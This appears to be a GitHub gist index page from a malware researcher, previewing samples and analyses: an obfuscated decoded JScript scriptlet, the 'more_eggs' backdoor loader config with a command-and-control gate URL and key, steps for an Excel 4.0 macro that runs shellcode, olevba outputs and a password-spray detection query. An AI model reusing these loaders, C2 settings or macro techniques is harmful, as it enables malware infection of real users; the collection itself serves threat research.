seclib’s gists

seclib / ca4f62279d6c7b7f8f7f37b97391f

Created November 20, 2019 13:16

Python exploit script found on VT

	import subprocess
	import re
	import binascii
	import socket
	import struct
	import threading
	import os
	import random
	import platform
	import decimal

seclib / c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740.bas

Created November 20, 2019 13:08

VBA Excel Macro threat PoC

	olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
	===============================================================================
	FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
	Type: OpenXML
	-------------------------------------------------------------------------------
	VBA MACRO ThisWorkbook.cls
	in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
	(empty macro)
	-------------------------------------------------------------------------------

seclib / VbaProject.OTM

Created November 20, 2019 13:04

Malicious OTM file 7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4 related to a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740


	olevba 0.54.2 on Python 3.7.2 - http://decalage.info/python/oletools
	===============================================================================
	7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4\7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4
	Type: OLE
	-------------------------------------------------------------------------------
	VBA MACRO ThisOutlookSession.cls
	7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4\7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4 - OLE stream: 'OutlookVbaData/VBA/ThisOutlookSession'
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

seclib / shellcode.xlsm

Created November 20, 2019 13:00

XLM (Excel 4.0 macro) to execute a shellcode into Excel (32 bits) - French Macro code

	BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL

	1. Open Excel
	2. Click on the active tab
	3. Select "Insérer"
	4. Click on "Macro MS Excel 4.0".
	5. This will create a new worksheet called "Macro1"

	================================================================================
	In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1:

seclib / ryuk.py

Created November 20, 2019 12:51

	# -- coding: utf-8 --

	from __future__ import print_function
	import os
	import sys

	debug = 0


	def excepthook(exception_type, exception, traceback):

seclib / attack.csl

Created August 7, 2019 01:51

Azure Sentinel Password spray query

	let valid_logons = (OfficeActivity
	\| where TimeGenerated > ago(30d)
	\| where Operation == 'UserLoggedIn'
	\| summarize by ClientIP);
	let only_invalid_logons = (OfficeActivity
	\| where TimeGenerated > ago(30d)
	\| where Operation == 'UserLoginFailed'
	\| summarize by ClientIP)
	\| join kind=anti (valid_logons) on ClientIP;
	OfficeActivity

seclib / Scriptlet Decoded

Created March 5, 2019 09:59

Scriptlet Decoded

	<component id="afgwwZzDmK9fxaJdvFovs8GYLrqj" >
	<registration
	progid="obLrn.U3rY5s"
	classid="{783B20D9-521E-9B68-FF17-33FF120E86D6}" >
	<script language="JScript" >
	function iZjDo3k(jfi2VxX){var rJK4Qm = "";var h8Oy = 0;for (h8Oy = jfi2VxX.length - 1; h8Oy >= 0; h8Oy -= 1){rJK4Qm += jfi2VxX.charAt(h8Oy);}return rJK4Qm;}function yZY8ddf(kJYu) {var q2XJc = "r";var kKfG = "C";var fu = [];var keFQz9Vbm2 = "o";fu[0] = "f" + q2XJc + keFQz9Vbm2 + "m";fu[1] = kKfG + "ha";fu[2] = q2XJc + kKfG;fu[3] = keFQz9Vbm2 + "de";var dmDU5P = fu[0] + fu[1] + fu[2] + fu[3];var mmeF5Ap = String;return mmeF5Ap[dmDU5P](kJYu);}function xP035QGgN(ag){return "+" ==ag?62:"/"==ag?63:vm27C7HmF.indexOf(ag);}function ph6T0AN(fIImISnUlb){var vpq8QW3uBI;var mRIs;var xYYT7RMqs;var hQtefhUl;var tgHARy;var sDBrnzbZ4I = "";for(vpq8QW3uBI = 0;vpq8QW3uBI<fIImISnUlb.length-3;vpq8QW3uBI += 4){mRIs=xP035QGgN(fIImISnUlb.charAt(vpq8QW3uBI+0));xYYT7RMqs=xP035QGgN(fIImISnUlb.charAt(vpq8QW3uBI+1));hQtefhUl=xP035QGgN(fIImISnUlb.charAt(vpq8QW3uBI+2));tgHARy=xP0

seclib / JS Terra Loader aka more_eggs backdoor

Created March 5, 2019 09:47

malware install loader

	var BV = "6.0";
	var Gate = "https://tonsandmillions.com/sendanalytics-28529/info";
	var hit_each = 1;
	var error_retry = 2;
	var restart_h = 4;
	var rcon_max = hit_each * (restart_h * 60) / (hit_each * hit_each);
	var Rkey = "ZkY3egXBulkogSbGEHqA";
	var rcon_now = 0;
	var gtfo = false;
	var selfdel = false;

seclib / e6f5r65t9n87r9u7yr87u

Created February 5, 2019 12:25

VBA DOC Malware MSBuild Scheduled Task

	##Uploader by satya_enki
	## Sample evolution:
	## c2e126498e61d4dc4154b5721dfd9811cd1d8c84063477e271134f0ed30e29ea
	## df7fc66bcceaf9b041fe839b5cda95dfad14c8475c6e2ec49dc23d5ae3ba62ac
	## b621015caa6077d7e85807c7f1509f88d5560d3e4ef439f578edc43f7b01c071
	## 7d2bf283d12bc6914708e2a4240c2cefbd1871c3b4ac3c9b2a70ea7553fb7f4a
	## 13fc853eb0e59b8133f93a3f55ed4086ffa8545aecef513f0bfe8363467fb110
	## 5e53334b062c7c908a7354c77343e7d356959727930f2557b5e65b936b2cd462

	olevba3 0.53.1 - http://decalage.info/python/oletools

seclib / adware

Last active January 4, 2019 18:47

It injects into Chrome, uses Google analytics for tracking, calls native Windows and COM APIs, and uses a scheduled task for persistence. Python sources and hashes


	## uploaded by @satya_enki
	## sample hashes: 23a6dea312426fa0f5ec60581c23359b66cd13e2a7c14a5e5d5173dafd0fc476, 9d7b60d008f46894d60800ce6f68533f8f1e5d2613f10512df6786e958d5a7f7
	## links:
	## https://www.reverse.it/sample/23a6dea312426fa0f5ec60581c23359b66cd13e2a7c14a5e5d5173dafd0fc476?environmentId=100
	## https://www.reverse.it/sample/9d7b60d008f46894d60800ce6f68533f8f1e5d2613f10512df6786e958d5a7f7?environmentId=100
	## Also mentioned here: http://www.programmersforum.ru/showthread.php?t=310934
	## https://forums.malwarebytes.com/topic/200388-removal-instructions-for-fast-approach-tt/

	## contents of app.py (49e766121a201104f05d3ebb5fdd9e8f337615c9d3a6177bd83539da8405ecbd):

Seclib seclib